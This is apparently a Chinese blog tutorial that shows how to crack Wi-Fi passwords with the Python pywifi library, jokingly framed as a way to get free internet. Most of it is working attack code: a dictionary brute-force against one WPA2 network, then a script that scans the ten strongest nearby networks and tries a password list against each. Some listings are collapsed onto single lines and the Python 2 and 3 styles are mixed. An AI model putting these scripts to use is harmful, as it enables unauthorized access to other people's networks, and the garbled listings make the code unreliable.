0x00 前言
如何让自己有网吧?对对对,就是这样....
如果一个搞web安全的,没有网,跟咸鱼有什么区别.....所以就有了本篇文章
0x01 Pywifi模块简单介绍
用一个连WiFi的例子,概括它的大概用法吧...
# -*- coding: UTF-8 -*-
"""Minimal pywifi example: join one WPA2-PSK network with a known passphrase."""
import pywifi
from pywifi import const  # constant definitions used below

# Use the first wireless interface pywifi reports.
adapter = pywifi.PyWiFi().interfaces()[0]

# Describe the network to join.
settings = pywifi.Profile()
settings.ssid = '*****'                      # network name (redacted on the page)
settings.auth = const.AUTH_ALG_OPEN          # 802.11 open-system authentication
settings.akm.append(const.AKM_TYPE_WPA2PSK)  # key management: WPA2-PSK
settings.cipher = const.CIPHER_TYPE_CCMP     # cipher: CCMP
settings.key = '*****'                       # passphrase, held in clear text in this script

# Register the profile on the interface, then request the connection.
registered = adapter.add_network_profile(settings)
adapter.connect(registered)
0x02 WIFI破解
一、对单一的目标破解
也许没表达对,我的意思呢,就是只对一个目标进行破解........
#-*- coding: UTF-8 -*- import pywifi from pywifi import const #引用一些定义 import time def testwifi(password): wifi=pywifi.PyWiFi()#抓取网卡接口 ifaces=wifi.interfaces()[0]#获取网卡 ifaces.disconnect()#断开无限网卡连接 profile=pywifi.Profile()#创建wifi连接文件 profile.ssid="*******"#定义wifissid profile.auth=const.AUTH_ALG_OPEN#网卡的开放 profile.akm.append(const.AKM_TYPE_WPA2PSK)#wifi加密算法 profile.cipher=const.CIPHER_TYPE_CCMP##加密单元 profile.key=password #wifi密码 ifaces.remove_all_network_profiles()#删除其他所有配置文件 tmp_profile=ifaces.add_network_profile(profile)#加载配置文件 ifaces.connect(tmp_profile)#连接wifi time.sleep(5)#5秒内能否连接上 if ifaces.status()==const.IFACE_CONNECTED: print "[-]WiFi connection success!" else: print "[-]WiFi connection failure!" ifaces.disconnect()#断开连接 time.sleep(1) return True def main(): print " ____ _ __ _____ _____ ___ " print " / ___|_ __ __ _ ___| | _ / /_ _| ___|_ _|" print "| | | '__/ _` |/ __| |/ / / / / | || |_ | | " print "| |___| | | (_| | (__| < V V / | || _| | | " print " ____|_| __,_|___|_|_ _/_/ |___|_| |___|" path=r"password.txt" files=open(path,'r') while True: f=files.readline() if not f: break f = f[:-1] testwifi(f) print "[-]Current password:",f files.close() if __name__ == '__main__': main()
二、实现对附近WiFi扫描并破解目标:扫描信号前十的WIFI并实现破解
分步实现吧,先实现抓取ssidname,然后再加上信号强度
# -*- coding: UTF-8 -*-
"""List nearby networks as (ssid, signal) pairs, highest signal value first."""
import pywifi
from pywifi import const  # imported by the original listing; not used here


def getwifi():
    """Scan with the first wireless interface and rank what it reports.

    Returns a tuple ``(count, pairs)``: the number of scan results and a
    list of ``(ssid, signal)`` tuples sorted by the signal field in
    descending order (presumably dBm, so the strongest network comes first).
    """
    adapter = pywifi.PyWiFi().interfaces()[0]
    adapter.scan()
    # Results are read right after the scan is requested, so the list may be
    # empty or stale on some adapters -- TODO confirm for the driver in use.
    pairs = [(cell.ssid, cell.signal) for cell in adapter.scan_results()]
    pairs.sort(key=lambda pair: pair[1], reverse=True)
    return len(pairs), pairs


if __name__ == '__main__':
    print(getwifi())
然后是通过信号强度实现排序,进入top10会进行后续的破解工作...
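# -*- coding: UTF-8 -*-
"""Scan nearby networks and print the ten with the highest signal value."""
import pywifi
from pywifi import const  # imported by the original listing; not used here
import time


def getwifi():
    """Scan with the first wireless interface and rank what it reports.

    Returns a tuple ``(count, pairs)``: the number of scan results and a
    list of ``(ssid, signal)`` tuples sorted by the signal field in
    descending order (presumably dBm, so the strongest network comes first).
    """
    adapter = pywifi.PyWiFi().interfaces()[0]
    adapter.scan()
    # A comprehension replaces the original accumulator, which was named
    # ``list`` and shadowed the builtin.
    pairs = [(cell.ssid, cell.signal) for cell in adapter.scan_results()]
    return len(pairs), sorted(pairs, key=lambda pair: pair[1], reverse=True)


def getsignal():
    """Repeat the scan until it yields results; return the first ten pairs.

    Sleeps one second after every scan, including the one that succeeds.
    Blocks indefinitely while no network is reported.
    """
    while True:
        count, ranked = getwifi()
        time.sleep(1)
        # Compare by value: the original ``is not 0`` tested object identity,
        # which only works where the interpreter reuses small int objects.
        if count != 0:
            return ranked[:10]


if __name__ == '__main__':
    print(getsignal())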
排完序之后,就是把信号强度去掉,然后获取ssidname
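# -*- coding: UTF-8 -*-
"""Scan nearby networks and print the SSIDs of the ten strongest results."""
import pywifi
from pywifi import const  # imported by the original listing; not used here
import time


def getwifi():
    """Scan with the first wireless interface and rank what it reports.

    Returns a tuple ``(count, pairs)``: the number of scan results and a
    list of ``(ssid, signal)`` tuples sorted by the signal field in
    descending order (presumably dBm, so the strongest network comes first).
    """
    adapter = pywifi.PyWiFi().interfaces()[0]
    adapter.scan()
    # A comprehension replaces the original accumulator, which was named
    # ``list`` and shadowed the builtin.
    pairs = [(cell.ssid, cell.signal) for cell in adapter.scan_results()]
    return len(pairs), sorted(pairs, key=lambda pair: pair[1], reverse=True)


def getsignal():
    """Repeat the scan until it yields results; return the first ten pairs.

    Sleeps one second after every scan, including the one that succeeds.
    Blocks indefinitely while no network is reported.
    """
    while True:
        count, ranked = getwifi()
        time.sleep(1)
        # Compare by value: the original ``is not 0`` tested object identity,
        # which only works where the interpreter reuses small int objects.
        if count != 0:
            return ranked[:10]


def ssidnamelist():
    """Return only the SSID of each pair from getsignal(), in the same order."""
    return [pair[0] for pair in getsignal()]


if __name__ == '__main__':
    print(ssidnamelist())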
之后,就是上面对单个wifi破解的套路了,只需稍微改一下,直接贴代码了
#-*- coding: UTF-8 -*- import pywifi from pywifi import const #引用一些定义 import time def getwifi(): wifi=pywifi.PyWiFi()#抓取网卡接口 ifaces=wifi.interfaces()[0]#获取网卡 ifaces.scan() bessis = ifaces.scan_results() list = [] for data in bessis: list.append((data.ssid, data.signal)) return len(list), sorted(list, key=lambda st: st[1], reverse=True) def getsignal(): while True: n, data = getwifi() time.sleep(1) if n is not 0: return data[0:10] def ssidnamelist(): ssidlist = getsignal() namelist = [] for item in ssidlist: namelist.append(item[0]) return namelist def testwifi(ssidname,password): wifi=pywifi.PyWiFi()#抓取网卡接口 ifaces=wifi.interfaces()[0]#获取网卡 ifaces.disconnect()#断开无限网卡连接 profile=pywifi.Profile()#创建wifi连接文件 profile.ssid=ssidname#定义wifissid profile.auth=const.AUTH_ALG_OPEN#网卡的开放 profile.akm.append(const.AKM_TYPE_WPA2PSK)#wifi加密算法 profile.cipher=const.CIPHER_TYPE_CCMP##加密单元 profile.key=password #wifi密码 ifaces.remove_all_network_profiles()#删除其他所有配置文件 tmp_profile=ifaces.add_network_profile(profile)#加载配置文件 ifaces.connect(tmp_profile)#连接wifi time.sleep(5)#5秒内能否连接上 if ifaces.status()==const.IFACE_CONNECTED: print "[-]WiFi connection success!" else: print "[-]WiFi connection failure!" ifaces.disconnect()#断开连接 time.sleep(1) return True def main(): print " ____ _ __ _____ _____ ___ " print " / ___|_ __ __ _ ___| | _ / /_ _| ___|_ _|" print "| | | '__/ _` |/ __| |/ / / / / | || |_ | | " print "| |___| | | (_| | (__| < V V / | || _| | | " print " ____|_| __,_|___|_|_ _/_/ |___|_| |___|" path=r"password.txt" files=open(path,'r') while True: f=files.readline() for ssidname in ssidnamelist(): ret=testwifi(ssidname,f) print 'Current WIFIname:',ssidname print 'Current password:',f files.close() if __name__ == '__main__': main()